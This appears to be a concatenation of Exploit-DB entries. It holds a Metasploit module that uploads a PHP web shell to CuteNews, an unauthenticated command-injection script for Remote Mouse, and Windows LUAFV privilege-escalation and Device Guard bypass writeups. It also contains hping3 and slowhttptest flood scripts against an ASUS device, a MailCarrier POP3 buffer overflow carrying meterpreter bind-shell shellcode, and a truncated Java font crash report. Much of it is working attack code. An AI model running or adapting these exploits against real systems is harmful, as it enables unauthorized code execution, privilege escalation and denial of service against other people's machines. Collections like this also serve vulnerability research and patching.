OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin'])
]
)
end
def exec
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "uploads","avatar_#{datastore['USERNAME']}_#{@shell}") # shell url
})
end
##
# Login and cookie information gathering
##
def login(uname, pass, check)
# 1st request to get cookie
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_post' => {
'action' => 'dologin',
'username' => uname,
'password' => pass
}
)
cookie = res.get_cookies
# 2nd request to cookie validation
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php"),
'cookie' => cookie
})
if res.code = 200 && (res.body =~ /dashboard/)
return cookie
end
fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
return nil
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
##
# Upload malicious file // payload integration
##
def upload_shell(cookie, check)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php?mod=main&opt=personal"),
'cookie' => cookie
})
signkey = res.body.split('__signature_key" value="')[1].split('"')[0]
signdsi = res.body.split('__signature_dsi" value="')[1].split('"')[0]
# data preparation
fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
@shell = "#{fname}"
pdata = Rex::MIME::Message.new
pdata.add_part('main', nil, nil, 'form-data; name="mod"')
pdata.add_part('personal', nil, nil, 'form-data; name="opt"')
pdata.add_part("#{signkey}", nil, nil, 'form-data; name="__signature_key"')
pdata.add_part("#{signdsi}", nil, nil, 'form-data; name="__signature_dsi"')
pdata.add_part('', nil, nil, 'form-data; name="editpassword"')
pdata.add_part('', nil, nil, 'form-data; name="confirmpassword"')
pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="editnickname"')
pdata.add_part("GIF\r\n" + payload.encoded, 'image/png', nil, "form-data; name=\"avatar_file\"; filename=\"#{fname}\"")
pdata.add_part('', nil, nil, 'form-data; name="more[site]"')
pdata.add_part('', nil, nil, 'form-data; name="more[about]"')
data = pdata.to_s
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, "index.php")
})
if res && res.code == 200 && res.body =~ /User info updated!/
print_status("Trying to upload #{fname}")
return true
else
fail_with(Failure::NoAccess, 'Error occurred during uploading!')
return false
end
end
##
# Exploit controls and information
##
def exploit
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
print_good("Authentication was successful with user: #{datastore['USERNAME']}")
if upload_shell(cookie, true)
print_good("Upload successfully.")
exec
end
end
##
# Version and Vulnerability Check
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php")
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200
version = res.body.split('target="_blank">CuteNews ')[1].split('</a>')[0]
if version < '2.1.3'
print_status("#{peer} - CuteNews is #{version}")
return Exploit::CheckCode::Vulnerable
end
end
return Exploit::CheckCode::Safe
end
end
##
# The end of the adventure (o_O) // AkkuS
##
# Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
# Date: 2019-09-04
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
# Tested on: Windows 10
#Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
#This script pops calc as proof of concept (albeit a bit slowly)
#It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv
def Ping(ip):
try:
target = socket(AF_INET, SOCK_STREAM)
target.settimeout(5)
target.connect((ip, 1978))
response=target.recv(1048)
target.close()
if response=="SIN 15win nop nop 300":
return True
else: return False
except:
print("ERROR: Request timed out")
def MoveMouse(x,y,ip):
def SendMouse(command,times,ip):
for x in range(times):
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(command,(ip,1978))
sleep(0.001)
if x>0:
command="mos 5m 1 0"
SendMouse(command,x,ip)
elif x<0:
x=x*-1
command="mos 5m -1 0"
SendMouse(command,x,ip)
if y>0:
command="mos 5m 0 1"
SendMouse(command,y,ip)
elif y<0:
y=y*-1
command="mos 6m 0 -1"
SendMouse(command,y,ip)
def MousePress(command,ip,action="click"):
if action=="down":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
elif action=="up":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" u"),(ip,1978))
elif action=="click":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
target.sendto((command+" u"),(ip,1978))
else: raise Exception('MousePress: No action named "'+str(action)+'"')
def SendString(string,ip):
for char in string:
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(characters[char],(ip,1978))
sleep(0.5)
class mouse:
leftClick="mos 5R l"
rightClick="mos 5R r"
middleClick="mos 5R m"
characters={
"A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112",
"F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127",
"K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122",
"P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97",
"U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108",
"Z":"key 8[ras]111",
"a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80",
"f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95",
"k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90",
"p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65",
"u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76",
"z":"key 7[ras]79",
"1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
"6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 7[ras]13", "9":"key 7[ras]12", "0":"key 6[ras]5",
"\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21",
"+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9",
">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117",
"#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19",
"*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18",
'"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85",
"~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72",
",":"key 7[ras]25", ".":"key 7[ras]27"
}
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("calc.exe",ip)
sleep(1)
SendString("\n",ip)
print("SUCCESS! Process calc.exe has run on target",ip)
def main():
try:
targetIP=argv[1]
except:
print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
exit()
if Ping(targetIP)==True:
PopCalc(targetIP)
else:
print("ERROR: Target machine is not running RemoteMouse")
exit()
if __name__=="__main__":
main()
Windows: LUAFV Delayed Virtualization Cache Manager Poisoning EoP
Platform: Windows 10 1809 (not tested earlier)
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
Summary:
The LUAFV driver can confuse the cache and memory manager to replace the contents of privileged file leading to EoP.
Description:
NOTE: This is different from issue 49895, that opens a backing file which could be overwritten as it wasn’t opened with the correct permissions. This issue instead replaces the cache data for an existing system file. Also note the additional section at the end which describes how this issue also causes a Bug Check. I’m not convinced it’s exploitable so I’m not reporting it separately.
The LUAFV driver supports many normal file operations to make virtualization as seamless as possible. This includes supporting memory mapping the file. When using delayed virtualization the driver allows mapping the original file read-only (as a data section or image section) without automatically creating the file in the virtual store. This trick is achieved by copying the real file’s SECTION_OBJECT_POINTERS (SOP) pointer from the file object opened in LuafvDelayOrVirtualizeFile to the top-level “virtual” file object.
When creating a new section for a file object the kernel calls MiCreateImageOrDataSection. After checking some parameters it calls MiCallCreateSectionFilters. This is important for virtualization as this results in calling LuafvPreAcquireForSectionSynchronization in the LUAFV driver. If that function detects that the caller is trying to map the section writable then LuafvPreWrite is called which will complete the delayed virtualization process, and will update the SOP pointer of the “virtual” file to the newly created backing file. If the file is not being mapped writable then the LUAFV driver leaves the SOP pointing to the “real” file.
MiCreateImageOrDataSection then checks whether the SOP::DataSectionObject CONTROL_AREA is populated. If not the kernel calls into MiCreateNewSection to setup a new one otherwise it’ll try and reuse the existing one which is present in the “virtual” file. If a new CONTROL_AREA is created it contains a reference to the “virtual” file, not the underlying system file. This control area gets written into the SOP structure of the “virtual” file, which when performing a read-only mapping results in writing to the SOP structure of the underlying “real” file.
The SOP structure is the responsibility of the filesystem driver, so when opening an NTFS file it’s the NTFS driver which allocates and sets up this pointer. However the contents of the structure are the responsibility of the cache manager. In order to support sharing mappings, especially for image mappings, the NTFS driver ensures that the same file in a volume returns the same SOP structure even if the FILE_OBJECT pointer is different. This is where the bug lies, perhaps it’s easier to explain how to exploit this:
1) Open a file for read/write access which will be delay virtualized. For example a file in system32 which isn’t owned by TrustedInstaller.
2) Create a read-only section based on the virtualized file. As this is read-only the LuafvPreAcquireForSectionSynchronization function won’t complete the delayed virtualization. Do not map the section.
3) As long as the file doesn’t already have a DataSectionObject entry (likely if the file’s never opened/read from) then a new CONTROL_AREA is created, backed by the “virtual” file.
4) Now cause the delayed virtualization process to complete, by sending an FSCONTROL code. The “virtual” file is now backed by a file in the virtual store which can be modified by the user, and the “virtual” file’s SOP is replaced accordingly. However the DataSectionObject in the “real” file’s SOP still refers to the virtual file. Now when reading data from the “real” file handle (even one opened directly without virtualization) the cache manager reads page contents from virtual store file, not the real file.
Once you’ve replaced a system file you can get direct EoP by replacing with the contents with a PE file which can be loaded using services such as the “Diagnostics Hub Standard Collector Service” which I’ve detailed before. This works because the exploit has replaced the cache for that file and as its shared between all FILE_OBJECT instances (at least until the cache cleans it up) then the image section is created backed on the cached data. The replaced file contents will be also be returned for direct reads, the file doesn’t have to be mapped to return the poisoned cache data.
One limitation to this vulnerability is you can’t extend the length of the file, but there are suitable files in system32 which can contain a suitably small PE file to perform the full exploit. Note that it also doesn’t really overwrite the file on disk, instead it poisons the cache with the wrong backing file. After a reboot the file will be back to normal, even if the cache is flushed back to disk (perhaps a privileged process opened the file) I’d expect the new data to be flushed back to the store file not the “real” file.
Fixing wise, one way you could go would be to always virtualize the file when mapped as a section regardless of the requested access. However I can’t be certain there’s not another route to this which could be exploited, for example just reading from the file might be sufficient to poison the cache if done at the right time.
These operations can’t be done from any sandbox that I know of so it’s only a user to system privilege escalation.
ADDITIONAL NOTE:
As the FILE_OBJECT can’t be completely locked across all the file operations the kernel makes use of Auto Boost to lock certain structures such as the SECTION_OBJECT_POINTERS and CONTROL_AREAs. The LUAFV driver doesn’t know anything about this so it’s possible to get delayed virtualization to complete from another thread in the middle of section creation resulting in mismatched pointers and ultimately a bug check. The easiest way to achieve the bug check is to map a virtualized file as an image with the Microsoft Signed mitigation policy enabled. If the file isn’t correctly signed then it will cause the section creation to fail, but after the CONTROL_AREA has been setup. As it’s possible to oplock on the kernel opening catalog files the delayed virtualization process can be completed at the right moment resulting in a lock mismatch when tearing down the setup CONTROL_AREA.
I can’t really tell if this is exploitable or not (I’m siding with no), but as it’s related I thought I should report it to ensure what ever fix for the current issue covers this edge case as well, or at least doesn’t make it work. I’ve provided a kernel crash report “additional_crash.txt” with this report, and I can provide a PoC if required.
Proof of Concept:
I’ve provided a PoC as a C# project. It will poison the cache for the file license.rtf in system32 with arbitrary contents. Note it uses a hardlink to virtualize the file, but it doesn’t have to as it could open the system32 file itself. It’s just done as it was easier to test this way and doesn’t impact the exploit. Also note that if the license.rtf file has been opened and the cache manager has created an entry then the exploit fails. In theory this would be deleted eventually (perhaps only under memory pressure), but a quick reboot usually fixes it unless your system opened license.rtf everytime the system starts.
1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
2) As a normal user run the PoC.
3) Open the file %WINDIR%\System32\license.rtf in notepad to see the contents.
Expected Result:
The license.rtf file contains the original RTF contents.
Observed Result:
The virtualization poisoned the contents of license.rtf with a new text string.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46717.zip
Windows: LUAFV NtSetCachedSigningLevel Device Guard Bypass
Platform: Windows 10 1809 (not tested earlier). Note I’ve not tested this on Windows 10 SMode.
Class: Security Feature Bypass
Summary:
The NtSetCachedSigningLevel system call can be tricked by the operation of LUAFV to apply a cached signature to an arbitrary file leading to a bypass of code signing enforcement under UMCI with Device Guard.
Description:
As I’ve hit this API multiple times by now I’m not going to explain its operation. The novel aspect of this issue is that you can get the LUAFV driver to win the signing race between reading the file to determine the hash to sign and the file the kernel EA is assigned to.
The exploit is as follows:
1) Create a file with the contents of a valid Microsoft signed file, such as notepad.exe in a virtualized location.
2) Get LUAFV to virtualize that file by requesting DELETE access. DELETE is not considered a write access right for the purposes of any checks in the signing process.
3) Copy the unsigned executable to the virtual store with the target virtualized name.
4) Call NtSetCachedSigningLevel on the virtualized file specifying flag 4.
This sequence results in the signing code reading the virtualized file, which contains the contents of notepad.exe and generating the signature based on that data. However when it goes to write the kernel EA the LUAFV driver considers that a write operation and virtualizes the file underneath. As we’ve created an arbitrary file in the virtual store the driver binds the file object to the unsigned file before writing out the kernel EA. This results in the EA going to the unsigned file rather than the original signed file. As you can’t virtualize files with executable extensions you must ensure the signed file has an allowed extension, however once you’ve signed the file you can rename it to something more appropriate.
Note that I have checked that Windows 10 Pro SMode does load the LUAFV driver, however I’ve not checked that this bypass will work on it (but no reason to believe it doesn’t).
Proof of Concept:
I’ve provided a PoC as a C# project. It will sign an arbitrary DLL file the map it into memory with the Microsoft only signature mitigation enabled.
1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
2) As a normal user run the PoC passing the path to an unsigned DLL which will do something noticeable in DllMain (such as popping a message box).
Expected Result:
The cached signature operation fails.
Observed Result:
The an arbitrary file is cached signed and can be loaded with an elevated process signature level.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46716.zip
# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS
# Date: 2019-04-14 # Exploit Author: YinT Wang;
# Vendor Homepage: www.asus.com
# Version: Hardware version: HG100 、Firmware version: 1.05.12
# Tested on: Currnet 1.05.12
# CVE : CVE-2018-11492
1. Description
The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).
2.Proof of Concept
Just Execute the following script in kali which could crash the devices
1. IPv4 packet and in result of devices crash.which written in linux script.
#needed to co-operate with hping3 tool
#with the time period at least 220s which could cause web server of HG100 devices crash
#!/bin/bash
read -p "enter the ip of HG100 here " url
hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
sleep 220
echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
exit 0
2.Slowhttp test and caused the devices crash.which written in linux script.
#needed to co-operate with slowhttptest tool
#with the time period 600s which could cause web server of HG100 devices crash
#!/bin/bash
read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
slowhttptest -H -R -c 10000 -l 600 -u $url
sleep 600
echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
exit 0
#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" command(POP3)
# Date: 16/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - SEH Exploit
# POC
# 1.) Change ip, username, password and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
#N.B For all Mail Carrier exploits, increase/decrease the initial EIP overwrite buffer if your target ip is larger/smaller in digits.
#Crash at 6174
import sys
import socket
import time
#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
"\x6f\x78\x55\x41\x41")
buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6882)
print "[*] Mail Server 2.51 POP3 Buffer Overflow in RETR command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
s.send('RETR ' + buffer + '\r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, check for meterpreter shell on target ip port 443!"
Windows: LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition EoP
Platform: Windows 10 1809 (not tested earlier)
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
Summary:
The LUAFV driver has a race condition in the LuafvPostReadWrite callback if delay virtualization has occurred during a read leading to the SECTION_OBJECT_POINTERS value being reset to the underlying file resulting in EoP.
Description:
NOTE: While it has a similar effect as issue 49960 I believe it is a different root cause which might still be exploitable after any fixes. This bug is actually worse than 49960 as you can modify the original file rather than just the cached data and you can do it to any file which can be virtualized as you don’t need to have a file which has a NULL CONTROL_AREA pointer.
When a IRP_MJ_READ request is issued to a delay virtualized file the filter driver first calls LuafvPreRedirectWithCallback which determines if the file is virtualized, it then sets the underlying, read-only file as the target file object for the filter processing as well as storing the file object in the completion context. When the read operation completes the LuafvPostReadWrite method is called which will inspect the completion context and copy out the file position and the SECTION_OBJECT_POINTERS value.
As there’s no locking in place at this point if the file delay virtualization is completed between the call to LuafvPreRedirectWithCallback and LuafvPostReadWrite then the SECTION_OBJECT_POINTERS and cache from the read-only file is used to overwrite the top-level “fake” file object, even though LuafvPerformDelayedVirtualization would have changed them to the new read-write virtual store file. By exploiting this race it’s possible to map the “real” file read-write which allows you to modify the data (you can probably also just write to the underlying file as well).
The trick to exploiting this bug is winning the race. One behavior that makes it an easy race to win is the delayed virtualization process passes on almost all CreateOptions flags to the underlying file create calls. By passing the FILE_COMPLETE_IF_OPLOCKED flag you can bypass waiting for an oplock break on IRP_MJ_CREATE and instead get it to occur on IRP_MJ_READ. The following is a rough overview of the process:
1) Open a file which will be delay virtualized and oplock with READ/HANDLE lease.
2) Open the file again for read/write access which will be delay virtualized. Pass the FILE_COMPLETE_IF_OPLOCKED flag to the create operation. The create operation will return STATUS_OPLOCK_BREAK_IN_PROGRESS but that’s a success code so the delayed virtualization setup is successful.
3) Create a new dummy file in the virtual store to prevent the driver copying the original data (which will likely wait for an oplock break).
4) Issue a read request on the virtualized file object, at this point the IRP_MJ_READ will be dispatched to “real” file and will get stuck waiting for an oplock break inside the NTFS driver.
5) While the read request is in progress issue a IRP_MJ_SET_EA request, this operation is ignored for oplock breaks so will complete, however the LUAFV driver will call LuafvPreWrite to complete the delayed virtualization process.
6) Close the acknowledge the oplock break by closing the file opened in 1.
7) Wait for read operation to complete.
8) Map the file as a read/write section. The data should be the “real” file contents not the dummy virtual store contents. Modifying the file will now cause the “real” file to be modified.
Note that even if you filtered the CreateOptions (as you should IMO) the race still exists, it would just be harder to exploit. Fixing wise, you probably want to check the virtualized object context and determine that the the delay virtualization has already occurred before overwriting anything in the top-level file object.
These operations can’t be done from any sandbox that I know of so it’s only a user to system privilege escalation.
Proof of Concept:
I’ve provided a PoC as a C# project. It will map the license.rtf file as read-write, although it won’t try and modify the data. However if you write to the mapped section it will change the original file.
1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
2) As a normal user run the PoC.
3) The PoC should print the first 16 characters of the mapped file.
Expected Result:
The mapped data should be all ‘A’ characters.
Observed Result:
The mapped data is the actual license.rtf file and it’s mapped writable.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46718.zip
A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f7285b39824, pid=234398, tid=0x00007f7286683700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libc.so.6+0x77824]# [ timer expired, abort... ]
Aborted
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered with the MALLOC_CHECK_=3 environment variable:
--- cut ---
$ MALLOC_CHECK_=3 bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
*** Error in `bin/java': free(): invalid pointer: 0x0000000002876320 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f84185edbcb]
/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f84185f3f96]
jre/8u202/lib/amd64/libfontmanager.so(+0x1d2b2)[0x7f83ddc672b2]
jre/8u202/lib/amd64/libfontmanager.so(+0x27ff4)[0x7f83ddc71ff4]
jre/8u202/lib/amd64/libfontmanager.so(+0x866f)[0x7f83ddc5266f]
jre/8u202/lib/amd64/libfontmanager.so(Java_sun_font_SunLayoutEngine_nativeLayout+0x230)[0x7f83ddc78990]
[0x7f84076306c7]
======= Memory map: ========
00400000-00401000 r-xp 00000000 fe:01 20840680 jre/8u202/bin/java
00600000-00601000 r--p 00000000 fe:01 20840680 jre/8u202/bin/java
00601000-00602000 rw-p 00001000 fe:01 20840680 jre/8u202/bin/java
023ba000-028d9000 rw-p 00000000 00:00 0 [heap]
3d1a00000-3fba00000 rw-p 00000000 00:00 0
3fba00000-670900000 ---p 00000000 00:00 0
670900000-685900000 rw-p 00000000 00:00 0
685900000-7c0000000 ---p 00000000 00:00 0
7c0000000-7c00c0000 rw-p 00000000 00:00 0
7c00c0000-800000000 ---p 00000000 00:00 0
[...]
--- cut ---
... under Valgrind:
--- cut ---
$ valgrind bin/java -cp . DisplaySfntFont test.ttf
[...]
==245623== Invalid write of size 2
==245623== at 0x40BF2750: GlyphIterator::setCurrGlyphID(unsigned short) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C0C089: SingleSubstitutionFormat1Subtable::process(LEReferenceTo<SingleSubstitutionFormat1Subtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C0C4A4: SingleSubstitutionSubtable::process(LEReferenceTo<SingleSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BF47E5: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo<LookupSubtable> const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo<LookupTable> const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
